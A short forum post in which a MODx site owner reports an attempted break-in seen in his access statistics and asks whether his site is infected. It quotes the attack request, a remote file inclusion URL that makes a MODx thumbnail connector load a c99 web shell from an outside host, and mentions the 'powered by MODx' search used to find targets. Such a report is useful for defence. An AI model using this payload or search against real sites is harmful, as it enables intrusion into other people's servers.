The hacker tried to hack my site!
I found the following access on my stats:
http : //www.roma21.it/ index.php?page=manager/media/browser/mcpuk/connectors/php/Commands/Thumbnail.php?base_path=
http://hackeramca.tripod.com/c99shell.txt?
Some information about the hacker:
Windows XP Firefox 2.0 1024x768 32 bit 88.224.109.151
Referer:
Google (Turkey), Query:
"powered by MODx"
Apart from this, yesterday I had a HUGE number of accesses coming from Google query "Powered by MODx"; many of them came from Turkey, but also Egipt, Morocco, Pakistan, China, France, Germany, etc.; that’s weird, I don’t know if Google suddenly increased my PageRank or there are lots of hackers around the net
Edit: My register_globals variable is set to ON. I wonder why the attack wasn’t successful... or perhaps my system has been already infected? What can I do in this case?